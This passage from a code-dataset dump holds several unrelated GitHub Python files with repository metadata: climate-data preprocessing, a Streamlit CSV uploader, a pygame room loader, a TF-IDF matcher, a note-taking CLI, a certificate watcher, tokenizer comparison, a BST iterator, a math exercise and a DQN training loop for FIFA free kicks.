fid,file_out = tempfile.mkstemp(dir=tmpdir,
prefix='za-',
suffix='.nc')
rmask_file = '/glade/work/mclong/grids/PacAtlInd_REGION_MASK_gx1v6.nc'
check_call([za,'-O','-rmask_file',rmask_file,'-o',file_out,file_in])
return file_out
class yaml_operator(yaml.YAMLObject):
'''A wrapper used for defining callable functions in YAML.
For example:
!operator
module: esmlab.climatology
function: compute_mon_climatology
kwargs: {}
'''
yaml_tag = u'!operator'
def __init__(self, module, function, kwargs={}):
'''Initialize attributes'''
self.module = module
self.function = function  # __repr__ and __call__ below read self.function
self.kwargs = kwargs
def __repr__(self):
'''Return string represention.'''
return getattr(importlib.import_module(self.module),
self.function).__repr__()
def __call__(self, val):
'''Call the function!'''
return getattr(importlib.import_module(self.module),
self.function)(val, **self.kwargs)
class process_data_source(object):
'''Class to support preprocessing operations.'''
def __init__(self, analysis_name, analysis_recipes, isderived=False,
clobber=False, **query_kwargs):
import popeos
importlib.reload(popeos)
#-- parse query: hardwired now for certain fields
self.experiment = query_kwargs['experiment']
self.variable = query_kwargs.pop('variable')
# get the analysis definition
self.analysis_name = analysis_name
with open(analysis_recipes) as f:
analysis_defs = yaml.load(f)
analysis = analysis_defs[analysis_name]
if 'description' in analysis:
self.analysis_description = analysis['description']
self.operators = analysis.pop('operators', [lambda ds: ds])
self.sel_kwargs = analysis.pop('sel_kwargs', {})
self.isel_kwargs = analysis.pop('isel_kwargs', {})
self.derived_var_def = analysis.pop('derived_var_def', None)
self.file_format = analysis.pop('file_format', 'nc')
if self.file_format not in ['nc','zarr']:
raise ValueError(f'unknown file format: {self.file_format}')
if isderived:
with open('derived_variable_definitions.yml') as f:
derived_var_defs = yaml.load(f)
derived_var_def = derived_var_defs[self.variable]
self.vars_dependent = derived_var_def['vars_dependent']
self.operators = derived_var_def['methods'] + self.operators
#-- set some attrs
self.dirout = os.path.join(dirout, 'processed_collections')
#-- pull specified dataset from catalog
self.catalog = data_catalog.get_catalog()
ensembles = data_catalog.find_in_index(**query_kwargs).ensemble.unique()
if len(ensembles) == 0:
raise ValueError(f'catalog contains no data for this query:\n'
f'{query_kwargs}')
self.n_members = len(ensembles)
self.cache_locations = []
self.input = [] # if the cached_locations are present,
# then this list will be empty in the returned
# object. Could be that the orig files are gone,
# (off disk) but the cache remains.
for ens_i in ensembles:
file_out = '.'.join([self.catalog,
self.experiment,
'%03d'%ens_i,
self.analysis_name,
self.variable,
self.file_format])
file_out = os.path.join(self.dirout,file_out)
self.cache_locations.append(file_out)
if os.path.exists(file_out) and clobber:
check_call(['rm','-fr',file_out]) # zarr files are directories
if not os.path.exists(file_out):
if not isderived:
data_desc = data_catalog.get_entries(ensemble=ens_i,
variable=self.variable,
**query_kwargs)
n_files = len(data_desc['files'])
else:
data_desc = [data_catalog.get_entries(ensemble=ens_i,
variable=v,
**query_kwargs)
for v in self.vars_dependent]
n_files = len(data_desc[0]['files'])
if n_files > 0:
self._process(file_out, data_desc)
else:
self.cache_locations.pop(-1)
logging.warning(f'No data to generate {file_out}.')
self.input.append(data_desc)
def __repr__(self):
'''Return compact string represention of self.'''
ens_str = '000'
if self.n_members > 1:
ens_str = f'000-{self.n_members:03d}'
return '.'.join([self.experiment,
ens_str,
self.analysis_name,
self.variable])
def load(self, **kwargs):
'''Load the cached data.'''
# QUESTION: whats the right thing to do if there are no files?
# some datasets might not have some variables
if not self.cache_locations:
return xr.Dataset()
option = kwargs.pop('option',None)
if option not in [None, 'za']:
raise ValueError(f'Unrecognized option: {option}')
if option == 'za' and self.file_format == 'zarr':
raise ValueError(f'File format = zarr is incompatible with za')
ds_list = []
for f in self.cache_locations:
# NOTE: this is probably not the right way to do this
if option == 'za':
f = pop_calc_zonal_mean(f)
ds_list.append(self._open_cached_dataset(f))
return xr.concat(ds_list,
dim='ens',
data_vars=[self.variable])
def _process(self, file_out, data_input):
'''Apply a preprocessing workflow to specified datasets and save a
cached file.'''
# if files_in is a 2D list, merge the files
if isinstance(data_input,list):
year_offset = data_input[0]['year_offset'][0]
dsi = xr.Dataset()
for v, d in zip(self.vars_dependent, data_input):
f = d['files']
dsi = xr.merge((dsi,xr.open_mfdataset(f,
decode_times=False,
decode_coords=False,
data_vars=[v],
chunks={'time':1})))
else: # concat with time
files_input = data_input['files']
year_offset = data_input['year_offset'][0]
dsi = xr.open_mfdataset(files_input,
decode_times=False,
decode_coords=False,
data_vars=[self.variable],
chunks={'time': 1})
tb_name, tb_dim = esmlab.utils.time_bound_var(dsi)
if tb_name and tb_dim:
dso = esmlab.utils.compute_time_var(dsi, tb_name, tb_dim,
year_offset=year_offset)
if self.sel_kwargs:
logging.info(f'Applying sel_kwargs: {self.sel_kwargs}')
dso = dso.sel(**self.sel_kwargs)
if self.isel_kwargs:
logging.info(f'Applying isel_kwargs: {self.isel_kwargs}')
dso = dso.isel(**self.isel_kwargs)
for op in self.operators:
logging.info(f'Applying operator: {op}')
dso = op(dso)
dso = esmlab.utils.uncompute_time_var(dso, tb_name, tb_dim)
self._write_output(dso, file_out)
dsi.close()
def _open_cached_dataset(self,filename):
'''Open a dataset using appropriate method.'''
if self.file_format == 'nc':
ds = xr.open_mfdataset(filename, decode_coords=False,
data_vars=[self.variable],
chunks={'time':1})
elif self.file_format == 'zarr':
ds = xr.open_zarr(filename, decode_coords=False)
#-- fix time?
return ds
def _write_output(self, ds, file_out):
'''Function to write output:
- add file-level attrs
- switch method based on file extension
'''
if not os.path.exists(self.dirout):
logging.info(f'creating {self.dirout}')
os.makedirs(self.dirout)
if os.path.exists(file_out):
logging.info(f'removing old {file_out}')
check_call(['rm','-fr',file_out]) # zarr files are directories
dsattrs = {
'history': f'created by {USER} on {datetime.now().strftime("%Y-%m-%d %H:%M:%S")}',
}
for k,v in self.__dict__.items():
dsattrs[k] = repr(v)
ds.attrs.update(dsattrs)
if self.file_format == 'nc':
logging.info(f'writing {file_out}')
ds.to_netcdf(file_out)
elif self.file_format == 'zarr':
logging.info(f'writing {file_out}')
ds.to_zarr(file_out)
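# --- Usage sketch (illustrative only; the analysis name, recipe file and query
# keywords below are placeholders, not values defined in this module) ---------
# proc = process_data_source('monclim', 'analysis_recipes.yml',
#                            experiment='20C', variable='SST')
# ds = proc.load()               # concatenates the cached members along 'ens'
# ds_za = proc.load(option='za') # zonal-mean view (netCDF caches only)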
|
NCAR/cmip6_cesm
|
project.py
|
project.py
|
py
| 10,694 |
python
|
en
|
code
| 1 |
github-code
|
6
|
22290772593
|
import streamlit as st
import pandas as pd
st.title("Upload CSV project")
uploaded_csv = st.file_uploader('選擇CSV檔')
if uploaded_csv is not None:
df = pd.read_csv(uploaded_csv,encoding='utf-8')
st.header('CSV檔內容:')
st.dataframe(df)
|
chiangcw0410/mysql_test
|
test/upload.py
|
upload.py
|
py
| 259 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70282380348
|
import src.globe as globe
from src.constants import *
from src.tile import *
class Room:
def __init__(self):
self.areaId = ''
self.roomId = ''
globe.Updater.registerDrawee(self.draw, ['nominal'], [], 'back')
globe.Updater.registerUpdatee(self.update, ['nominal'], ['paused'])
self.tiles = []
self.backgroundTiles = []
self.entities = []
self.hasBackground = False
def populateTiles(self):
rows = self.roomData['data']['tiles']
rCounter = 0
cCounter = 0
for row in rows:
self.tiles.append([])
for tile in row:
tileData = globe.Loader.getTile(tile)
tileX = cCounter*TILE_SIZE
tileY = rCounter*TILE_SIZE
if(tileData['Default']):
t = LevelBlock((tileX, tileY),(rCounter, cCounter), tileData)
else:
t = Tile((tileX, tileY),(rCounter, cCounter), tileData, tileData['data'], False, tileData['animationTime'])
self.tiles[rCounter].append(t)
cCounter += 1
rCounter += 1
cCounter = 0
def populateBackgroundTiles(self):
sets = self.roomData['data']['bgTiles']
rCounter = 0
cCounter = 0
for row in sets:
self.backgroundTiles.append([])
for tile in row:
tileData = globe.Loader.getTile(tile)
tileX = cCounter*TILE_SIZE
tileY = rCounter*TILE_SIZE
newTile = BackgroundTile((rCounter, cCounter),(tileX,tileY),tileData['data'],tileData['animationTime'])
self.backgroundTiles[rCounter].append(newTile)
cCounter += 1
rCounter+=1
cCounter = 0
def load(self, areaId, roomId):
self.areaId = areaId
self.roomId = roomId
self.tiles = []
self.backgroundTiles = []
self.hasBackground = False
for item in self.entities:
item.unRegister()
#globe.Updater.removeEntity(item)
self.entities = []
self.roomData = globe.Loader.getData(self.areaId, 'Rooms', self.roomId)
self.roomData.update(self.roomData['data'])
self.populateTiles()
if('bgTiles' in self.roomData):
if(len(self.roomData['bgTiles'])>0):
self.hasBackground = True
self.populateBackgroundTiles()
globe.Camera.newRoom()
if(self.roomData['doEntities']):
for entity in self.roomData['entities']:
if(not 'posX' in entity):
entity['posX'] = 0
if(not 'posY' in entity):
entity['posY'] = 0
if(not 'action' in entity):
entity['action'] = ''
baby = globe.Loader.getNewEntity(entity['name'])
baby.addData(entity)
baby.register()
baby.spawn((entity['posX'],entity['posY']))
self.entities.append(baby)
#globe.Updater.addEntity(baby)
def update(self, elapsed_time):
if(self.hasBackground):
for row in self.backgroundTiles:
for tile in row:
tile.update(elapsed_time)
for row in self.tiles:
for tile in row:
tile.update(elapsed_time)
def draw(self):
if(self.hasBackground):
for row in self.backgroundTiles:
for tile in row:
tile.draw()
for row in self.tiles:
for tile in row:
tile.draw()
def getHeight(self):
return len(self.tiles)*TILE_SIZE
def getWidth(self):
return len(self.tiles[0])*TILE_SIZE
def getTile(self, tileIndex):
if(tileIndex[0] < 0 or tileIndex[1]<0):
return False
if(tileIndex[1] < len(self.tiles) and tileIndex[0] < len(self.tiles[0])):
return self.tiles[tileIndex[1]][tileIndex[0]]
return False
#returns a subset of tiles around a point, allowing for more efficient collision detection
def getTilesAround(self, pos, TilesAround=2):
xBot = int(TILE_SIZE * round(float(pos[0])/TILE_SIZE) / TILE_SIZE) - 2
xTop = xBot + 5
yBot = int(TILE_SIZE * round(float(pos[1])/TILE_SIZE) / TILE_SIZE) - 2
yTop = yBot + 5
if(xBot < 0):
xBot = 0
if(yBot < 0):
yBot = 0
if(yTop > len(self.tiles)):
yTop = len(self.tiles)
if(yTop < 2):
yTop = 2
if(xTop > len(self.tiles[0])):
xTop = len(self.tiles[0])
if(xTop < 2):
xTop = 2
rets = []
for item in self.tiles[yBot:yTop]:
rets += item[xBot:xTop]
return rets
def getPref(self, pref):
return self.roomData[pref]
def getDisplayName(self):
if(self.getPref('displayName')):
return self.getPref('displayName')
else:
return "Unknown Room"
def getEntities(self):
return self.entities
|
Dieff/pygame_platform_engine
|
src/room.py
|
room.py
|
py
| 5,398 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27581741716
|
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 4 13:56:32 2017
@author: hannu
"""
import numpy as np
import matplotlib.pyplot as plt
import random
import scipy.constants as const
from constants import *
####### Functions for KMC ######
def f(sigma, x):
normal = (1/(2*const.pi*sigma**2))*np.exp(-(x**2)/(2*sigma**2))
return normal
#function to calculate the recombinations
def recombination(vacx,vacy,intx,inty,N,rates,defs):
distvac=distances(vacx,vacy,N)
distint=distances(intx,inty,N)
for i in range(N):
for j in range(N):
#distvac=distances(vacx,vacy,N)
#distint=distances(intx,inty,N)
if(abs((distvac[i]-distint[j]))<=recomb):
vacx[i]=np.NaN
vacy[i]=np.NaN
rates[i]=0
defs=defs-2
intx[j]=np.NaN
inty[j]=np.NaN
rates[j+299]=0
distvac[i]=np.sqrt((vacx[i]**2+vacy[i]**2))
distint[j]=np.sqrt((intx[j]**2+inty[j]**2))
return(defs,vacx,vacy,intx,inty)
#calculates the distance from the origin
def distances(x,y,N):
distances = np.linspace(-70*10**-10,70*10**-10, num=N)
for i in range(N):
distances[i]=np.sqrt(x[i]**2+y[i]**2)
return distances
def cum(rates):
# cumulative rate list used for KMC event selection: R[i] = rates[0] + ... + rates[i]
R=[0 for i in range(600)]
for i in range(600):
R[i] = (R[i-1] if i > 0 else 0) + rates[i]
return(R)
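# Illustrative sketch of the standard KMC (residence-time) event selection that
# a cumulative rate list enables; it uses numpy's cumsum directly so it works
# for any number of rates, independent of the fixed size used in cum().
def choose_event_and_dt(rates):
    R = np.cumsum(rates)                  # R[i] = rates[0] + ... + rates[i]
    total = R[-1]
    u1, u2 = np.random.random(2)
    event = int(np.searchsorted(R, u1 * total, side='right'))
    dt = -np.log(1.0 - u2) / total        # exponentially distributed waiting time
    return event, dt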
|
hpelttari/Kinetic-Monte-Carlo
|
Si_migration/functions.py
|
functions.py
|
py
| 1,456 |
python
|
en
|
code
| 1 |
github-code
|
6
|
32640335090
|
# AUTHOR: Louis Tsiattalou
# DESCRIPTION: Match list items to closest tf-idf match in second list.
import pandas as pd
from tfidf_matcher.ngrams import ngrams
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neighbors import NearestNeighbors
def matcher(original=[], lookup=[], k_matches=5, ngram_length=3):
"""Takes two lists, returns top `k` matches from `lookup` dataset.
This function does this by:
- Splitting the `lookup` list into ngrams.
- Transforming the resulting ngram list into a TF-IDF Sparse Matrix.
- Fit a NearestNeighbours Model to the matrix using the lookup data.
- Transform the `original` list into a TF-IDF Sparse Matrix.
- Calculates distances to all the `n-matches` nearest neighbours
- Then extract the `original`, `n-matches` closest lookups, and calculate
a match score (abs(1 - Distance to Nearest Neighbour))
:param original: List of strings to generate ngrams from.
:type original: list (of strings), or Pandas Series.
:param lookup: List of strings to match against.
:type lookup: list (of strings), or Pandas Series.
:param k_matches: Number of matches to return.
:type k_matches: int
:param ngram_length: Length of Ngrams returned by `tfidf_matcher.ngrams` callable
:type ngram_length: int
:raises AssertionError: Throws an error if the datatypes in `original` aren't strings.
:raises AssertionError: Throws an error if the datatypes in `lookup` aren't strings.
:raises AssertionError: Throws an error if `k_matches` isn't an integer.
:raises AssertionError: Throws an error if k_matches > len(lookup)
:raises AssertionError: Throws an error if ngram_length isn't an integer
:return: Returns a Pandas dataframe with the `original` list,
`k_matches` columns containing the closest matches from `lookup`,
as well as a Match Score for the closest of these matches.
:rtype: Pandas dataframe
"""
# Assertions
assert all(
[type(x) == type("string") for x in original]
), "Original contains non-str elements!"
assert all(
[type(x) == type("string") for x in lookup]
), "Lookup contains non-str elements!"
assert type(k_matches) == type(0), "k_matches must be an integer"
assert k_matches < len(
lookup
), "k_matches must be shorter than the total length of the lookup list"
assert type(ngram_length) == type(0), "ngram_length must be an integer"
# Enforce listtype, set to lower
original = list(original)
lookup = list(lookup)
original_lower = [x.lower() for x in original]
lookup_lower = [x.lower() for x in lookup]
# Set ngram length for TfidfVectorizer callable
def ngrams_user(string, n=ngram_length):
return ngrams(string, n)
# Generate Sparse TFIDF matrix from Lookup corpus
vectorizer = TfidfVectorizer(min_df=1, analyzer=ngrams_user)
tf_idf_lookup = vectorizer.fit_transform(lookup_lower)
# Fit KNN model to sparse TFIDF matrix generated from Lookup
nbrs = NearestNeighbors(n_neighbors=k_matches, n_jobs=-1, metric="cosine").fit(
tf_idf_lookup
)
# Use nbrs model to obtain nearest matches in lookup dataset. Vectorize first.
tf_idf_original = vectorizer.transform(original_lower)
distances, lookup_indices = nbrs.kneighbors(tf_idf_original)
# Extract top Match Score (which is just the distance to the nearest neighbour),
# Original match item, and Lookup matches.
original_name_list = []
confidence_list = []
index_list = []
lookup_list = []
# i is 0:len(original), j is list of lists of matches
for i, lookup_index in enumerate(lookup_indices):
original_name = original[i]
# lookup names in lookup list
lookups = [lookup[index] for index in lookup_index]
# transform distances to confidences and store
confidence = [1 - round(dist, 2) for dist in distances[i]]
original_name_list.append(original_name)
# store index
index_list.append(lookup_index)
confidence_list.append(confidence)
lookup_list.append(lookups)
# Convert to df
df_orig_name = pd.DataFrame(original_name_list, columns=["Original Name"])
df_lookups = pd.DataFrame(
lookup_list, columns=["Lookup " + str(x + 1) for x in range(0, k_matches)]
)
df_confidence = pd.DataFrame(
confidence_list,
columns=["Lookup " + str(x + 1) + " Confidence" for x in range(0, k_matches)],
)
df_index = pd.DataFrame(
index_list,
columns=["Lookup " + str(x + 1) + " Index" for x in range(0, k_matches)],
)
# bind columns
matches = pd.concat([df_orig_name, df_lookups, df_confidence, df_index], axis=1)
# reorder columns | can be skipped
lookup_cols = list(matches.columns.values)
lookup_cols_reordered = [lookup_cols[0]]
for i in range(1, k_matches + 1):
lookup_cols_reordered.append(lookup_cols[i])
lookup_cols_reordered.append(lookup_cols[i + k_matches])
lookup_cols_reordered.append(lookup_cols[i + 2 * k_matches])
matches = matches[lookup_cols_reordered]
return matches
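# Example usage (the company names below are made-up illustration data; any two
# lists of strings work):
if __name__ == "__main__":
    originals = ["appel inc", "goggle llc", "microsofte"]
    lookups = ["Apple Inc", "Google LLC", "Microsoft Corporation",
               "Amazon.com Inc", "Meta Platforms Inc"]
    print(matcher(originals, lookups, k_matches=2, ngram_length=3))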
|
LouisTsiattalou/tfidf_matcher
|
tfidf_matcher/matcher.py
|
matcher.py
|
py
| 5,188 |
python
|
en
|
code
| 41 |
github-code
|
6
|
2296903682
|
# is
user1 = {
"name": "Jean",
"age": 33
}
user2 = {
"name": "Jean",
"age": 33
}
print(user1 == user2)
print(user1 is user1)
print(user1 is user2)
mon_tableau = [3]
print(mon_tableau is mon_tableau)
# Since a list is hidden behind a reference, the behaviour is a bit different;
# keep that in mind.
print([3] is [3])
# is not
print([3] is not [3])
print(True is not False)
var = 4
def plus_three(n):
return n + 3
var = plus_three(var)
print(var)
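# A classic pitfall with `is` on numbers (illustrative): CPython caches small
# integers, so identity can "work" by accident for small values but not for
# objects built at runtime. Use == for value comparison.
a = 256
b = 256
print(a is b) # True on CPython: small integers are cached
x = 1000
y = int("1000") # built at runtime, so a distinct object with the same value
print(x == y) # True: same value
print(x is y) # False on CPython: different objects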
|
Alikae/PythonFormation
|
05 Operateurs/4_identité.py
|
4_identité.py
|
py
| 493 |
python
|
en
|
code
| 1 |
github-code
|
6
|
23235971280
|
"""
__/\\\\\\\\\\\\______________________/\\\\\\\\\\\____/\\\________/\\\_
_\/\\\////////\\\__________________/\\\/////////\\\_\/\\\_______\/\\\_
_\/\\\______\//\\\________________\//\\\______\///__\/\\\_______\/\\\_
_\/\\\_______\/\\\_____/\\\\\______\////\\\_________\/\\\_______\/\\\_
_\/\\\_______\/\\\___/\\\///\\\_______\////\\\______\/\\\_______\/\\\_
_\/\\\\\\\\\\\\/____\///\\\\\/___\///\\\\\\\\\\\/____\///\\\\\\\\\/___
_\////////////________\/////_______\///////////________\/////////_____
Created by Tomáš Sandrini
"""
from . import __version__
import argparse
import os
import shutil
import sys
from datetime import datetime
from . import handler
from .actions import ValidateMonths, ValidateYears
def get_args(args):
"""
Get the script arguments.
"""
description = "DoSU - pandoc note writing utility"
arg = argparse.ArgumentParser(description=description)
arg.add_argument(
'-M',
metavar='make',
nargs='+',
help="Make (create) given subjects"
)
arg.add_argument(
'-C',
metavar='compile',
nargs='+',
help="Compile notes for a given subjects"
)
arg.add_argument(
'-W',
metavar='write',
help="Start note taking for a subject"
)
arg.add_argument(
'-D',
metavar='delete',
nargs='+',
help="Delete subjects"
)
arg.add_argument(
'-m',
metavar='month',
nargs='+',
action=ValidateMonths,
help="months"
)
arg.add_argument(
'-y',
metavar='year',
nargs='+',
action=ValidateYears,
help="years"
)
arg.add_argument(
'-v',
action='store_true',
help="Print current dosu version"
)
arg.add_argument(
'-l',
action='store_true',
help="List all subjects"
)
arg.add_argument(
'-q',
action='store_true',
help="Quiet mode, don't print anything and \
don't display notifications."
)
return arg.parse_args(args)
def process_args(args):
"""
Process args.
"""
if not len(sys.argv) > 1:
print("error: dosu needs to be given arguments to run.\n"
" Refer to \"dosu -h\" for more info.")
sys.exit(1)
if args.q:
sys.stdout = sys.stderr = open(os.devnull, 'w')
if args.M:
handler.make(args.M)
if args.D:
handler.delete(args.D)
if args.W:
handler.write(args.W)
if args.C:
today = datetime.today()
years = args.y if args.y is not None else [today.year]
if args.y:
months = args.m if args.m else list(range(1, 13))
else:
months = args.m if args.m else [today.month]
handler.compile(subjects=args.C, years=years, months=months)
if args.l:
handler.list()
if args.v:
print("DoSU ", __version__)
sys.exit(0)
def main():
"""
Main script function
"""
args = get_args(sys.argv[1:])
process_args(args)
if __name__ == "__main__":
main()
|
tsandrini/dosu
|
dosu/__main__.py
|
__main__.py
|
py
| 3,242 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5366659164
|
import datetime
import logging
import os.path
import x509
LOG = logging.getLogger(__name__)
class CertWatcher(object):
def __init__(self, key_path, cert_path, common_name, ca_driver,
on_refresh_success=None, on_refresh_failure=None,
refresh_window=None):
if not os.path.isfile(key_path):
raise Exception("key needs to exist")
self.key_path = key_path
self.cert_path = cert_path
self.ca_driver = ca_driver
self.on_refresh_success = on_refresh_success
self.on_refresh_failure = on_refresh_failure
self.common_name = common_name
self.refresh_window = refresh_window
@property
def key(self):
return open(self.key_path).read()
@property
def cert(self):
return open(self.cert_path).read()
def get_expire_date(self):
return x509.get_expire_date(self.cert)
def seconds_until_expiry(self):
diff = self.get_expire_date() - datetime.datetime.now()
return diff.total_seconds()
def _replace_cert(self, cert_contents):
LOG.info("Replacing certificate at %s" % self.cert_path)
with open(self.cert_path, "w") as cert:
cert.write(cert_contents)
def _will_be_expired(self, date):
return date > self.get_expire_date()
def _expires_in_window(self):
now = datetime.datetime.now()
if not self.refresh_window:
LOG.debug("No refresh window set, assuming expired")
return True
window = now + datetime.timedelta(0, self.refresh_window)
if self._will_be_expired(window):
LOG.info("%s is expired inside window of %s"
% (self.cert_path, self.refresh_window))
return True
LOG.info("Certificate valid within window of %s seconds"
% self.refresh_window)
return False
def _cert_exists(self):
if not os.path.isfile(self.cert_path):
LOG.info("No cert found at %s" % self.cert_path)
return False
return True
def is_invalid_cert(self):
return not self._cert_exists() or self._expires_in_window()
def check_and_update(self):
LOG.info('Checking validity of certificate %s' % self.cert_path)
if self.is_invalid_cert():
csr = x509.generate_csr(self.key, self.common_name)
cert = None
try:
cert = self.ca_driver.sign(csr)
except Exception as e:
LOG.exception("Could not retrieve cert\n%s", e)
if cert:
self._replace_cert(cert)
self.on_refresh_success()
else:
self.on_refresh_failure()
|
takac/cathead
|
cathead/certwatch.py
|
certwatch.py
|
py
| 2,756 |
python
|
en
|
code
| 3 |
github-code
|
6
|
8105270111
|
# coding=utf-8
import click
import MeCab
from transformers import BertJapaneseTokenizer, BertForMaskedLM
@click.command()
@click.option('--text', '-t', default='')
def main(text):
tokenizer = BertJapaneseTokenizer.from_pretrained('bert-base-japanese-whole-word-masking')
tokenized_text = tokenizer.tokenize(text)
print('bert wakatigaki:{}'.format(tokenized_text))
mecab = MeCab.Tagger("-Owakati")
mecab_text = mecab.parse(text)
print('mecab wakatigaki:{}'.format(mecab_text.split()))
if __name__ == '__main__':
main()
|
ys201810/bert_work
|
src/compare_mecab_bert_wakatigaki.py
|
compare_mecab_bert_wakatigaki.py
|
py
| 551 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27614075468
|
# Your BSTIterator will be called like this:
# i, v = BSTIterator(root), []
# while i.hasNext(): v.append(i.next())
from queue import Queue
from queue import LifoQueue
class BSTIterator(object):
def __init__(self, root):
"""
:type root: TreeNode
"""
# Stack of nodes still to be visited; the smallest pending value is on top.
self.S = LifoQueue()
self._push_left(root)
def _push_left(self, node):
# Push `node` and every left descendant, so the leftmost (smallest) ends on top.
while node:
self.S.put(node)
node = node.left
def hasNext(self):
"""
:rtype: bool
"""
return not self.S.empty()
def next(self):
"""
:rtype: int
"""
# Pop the smallest pending node, then stage its right subtree.
node = self.S.get()
self._push_left(node.right)
return node.val
# Your BSTIterator will be called like this:
# i, v = BSTIterator(root), []
# while i.hasNext(): v.append(i.next())
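# Quick self-check (LeetCode normally supplies TreeNode; the minimal stand-in
# below exists only so the iterator can be exercised locally):
class TreeNode(object):
    def __init__(self, val, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right

if __name__ == "__main__":
    root = TreeNode(7, TreeNode(3), TreeNode(15, TreeNode(9), TreeNode(20)))
    i, v = BSTIterator(root), []
    while i.hasNext():
        v.append(i.next())
    print(v)  # expected in-order traversal: [3, 7, 9, 15, 20]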
|
abhishekvaid/leetcode
|
_1008_bst_iterator.py
|
_1008_bst_iterator.py
|
py
| 1,030 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22084110585
|
# def fact(base):
# return 1 if (n == 1 or n ==0 ) else n * fact(n-1)
# number , n = map(int,input().split())
# qw = (x**fact(n))%10
# print(po)
# import numpy as np
# x , n = map(int,input().split())
# a = np.math.factorial(n)
# if n >=2:
# print(pow(x,a/2,10))
# else:
# print(pow(x,a,10))
# def boost(n,x):
# result = 1
# while x > 0:
# if x %2 == 1:
# result *= ((n**(x-1))*n)
# result *= ((n*n)**(x//2))
# return result
# print(boost(2,2))
# def fast_power(base, power):
# """
# Returns the result of a^b i.e. a**b
# We assume that a >= 1 and b >= 0
# Remember two things!
# - Divide power by 2 and multiply base to itself (if the power is even)
# - Decrement power by 1 to make it even and then follow the first step
# """
# def fast_power(base, power):
# result = 1
# while power > 0:
# if power % 2 == 0:
# power = power // 2
# base = base * base
# else:
# power = power - 1
# result = result * base
# power = power // 2
# base = base * base
# return result
# import numpy as np
# x , n = map(int,input().split())
# mod = np.math.factorial(n)%10
# po = (x**mod)%10
# print(po)
# print(24%10)
number, base = map(int,input().split())
# last digit of number**(base!): last digits repeat with a cycle length that
# divides 4, and for base >= 4 the factorial is a positive multiple of 4, so
# exponent 4 is an equivalent positive representative
if base == 0 or base == 1:
power = 1
elif base == 2:
power = 2
elif base == 3:
power = 6
else:
power = 4
print(pow(number,power)%10)
|
vamshipv/code-repo
|
may circuits/fact.py
|
fact.py
|
py
| 1,532 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28151900553
|
import collections
import matplotlib.pyplot as plt
import numpy as np
import os
import cv2
import time
from DQN_RGB import DQN_RGB
from DQN import DQN
from FifaEnv import FifaEnv
from scipy.stats import wilcoxon
from DynamicMLP import MLP
import scipy.misc
from scipy.misc import imresize
# Initialize Global Parameters
DATA_DIR = "Models/"
NUM_ACTIONS = 4 # number of valid actions
MAX_ACTIONS = 6 # If execute MAX_ACTIONS, then it's considered a loop
GAMMA = 0.9 # decay rate of past observations
INITIAL_EPSILON = 1 # starting value of epsilon
FINAL_EPSILON = 0.1 # final value of epsilon
NUM_EPOCHS_OBSERVE = 200
NUM_EPOCHS_TRAIN = 5000
NUM_EPOCHS_TEST = 100
STEPS_TARGET_NETWORK = 1
BATCH_SIZE = 32
NUM_EPOCHS = NUM_EPOCHS_OBSERVE + NUM_EPOCHS_TRAIN
def train_dqn_free_kicks():
game_env = FifaEnv()
dqn = DQN_RGB(NUM_ACTIONS)
#dqn = DQN(NUM_ACTIONS)
dqn.save_model('target_network')
dqn.update_target_network()
num_goals = 0
num_steps = 0
epochs = []
avg_goals = []
epsilon = INITIAL_EPSILON
print('----- STARTING DQN AGENT -----')
for e in range(NUM_EPOCHS):
history_actions = []
game_over = False
goal = 0
loss = 0.0
time.sleep(1.5)
# Verifies if it's an end of the training session (Time is over) or if there's a bug
end_training_session = game_env.check_end_of_episode()
bug = game_env.check_bug()
if end_training_session or bug:
game_env.hard_reset()
while bug:
bug = game_env.check_bug()
# get first state
#frames = collections.deque(maxlen=4)
x_t = game_env.observe_state()
#frames.append(x_t)
#s_t = dqn.preprocess_images(np.array(list(frames)))
s_t = dqn.preprocess_image(x_t)
while not game_over:
# Updates the previous state (previous state = current state)
s_tm1 = s_t
#### Get next action ####
# if len(history_actions) > MAX_ACTIONS, there's a movement loop. So shoot the ball
if len(history_actions) < MAX_ACTIONS:
# Observation action (random)
if e < NUM_EPOCHS_OBSERVE:
a_t = np.random.randint(low=0, high=NUM_ACTIONS, size=1)[0]
# Random or the best current action based on q-value (dqn model)
else:
# Random (exploration)
if np.random.rand() <= epsilon:
a_t = np.random.randint(low=0, high=NUM_ACTIONS, size=1)[0]
# Best action (exploitation)
else:
q = dqn.model.predict(s_t)[0]
a_t = np.argmax(q)
history_actions.append(a_t)
else:
a_t = np.random.randint(low=2, high=NUM_ACTIONS, size=1)[0]
# apply action, get reward
x_t, r_t, game_over = game_env.step(a_t)
#frames.append(x_t)
#s_t = dqn.preprocess_images(np.array(list(frames)))
s_t = dqn.preprocess_image(x_t)
# increment goal if it's a goal
if r_t == 1:
goal += 1
# store experience
dqn.experience.append((s_tm1, a_t, r_t, s_t, game_over))
if e >= NUM_EPOCHS_OBSERVE:
# finished observing, now start training
# get next batch
num_steps += 1
X, Y = dqn.get_next_batch(NUM_ACTIONS, GAMMA, BATCH_SIZE)
#X, Y = dqn.get_next_batch_2(NUM_ACTIONS, GAMMA, BATCH_SIZE)
loss += dqn.model.train_on_batch(X, Y)
if num_steps == STEPS_TARGET_NETWORK and STEPS_TARGET_NETWORK != 1:
num_steps = 0
dqn.update_target_network()
# reduce epsilon gradually
if epsilon > FINAL_EPSILON and e >= NUM_EPOCHS_OBSERVE:
#epsilon = 4 / ((e - NUM_EPOCHS_OBSERVE + 1) ** (1/2))
epsilon -= ((INITIAL_EPSILON - FINAL_EPSILON) / (NUM_EPOCHS_TRAIN / 1.5))
#if e >= NUM_EPOCHS_OBSERVE:
num_goals += goal
epochs.append((e + 1))
avg_goals.append(float(num_goals / (e + 1)))
print("Epoch {:04d}/{:d} | Loss {:.5f} | Epsilon: {:.3f} | Total Goals: {:d} | Epoch Goal: {:d}"
.format(e + 1, NUM_EPOCHS, loss, epsilon, num_goals, goal))
if ((e + 1) % NUM_EPOCHS_OBSERVE == 0 and e >= NUM_EPOCHS_OBSERVE):
dqn.model.save(os.path.join(DATA_DIR, "drl-network-fifa-final.h5"), overwrite=True)
dqn.model.save(os.path.join(DATA_DIR, "drl-network-fifa-final.h5"), overwrite=True)
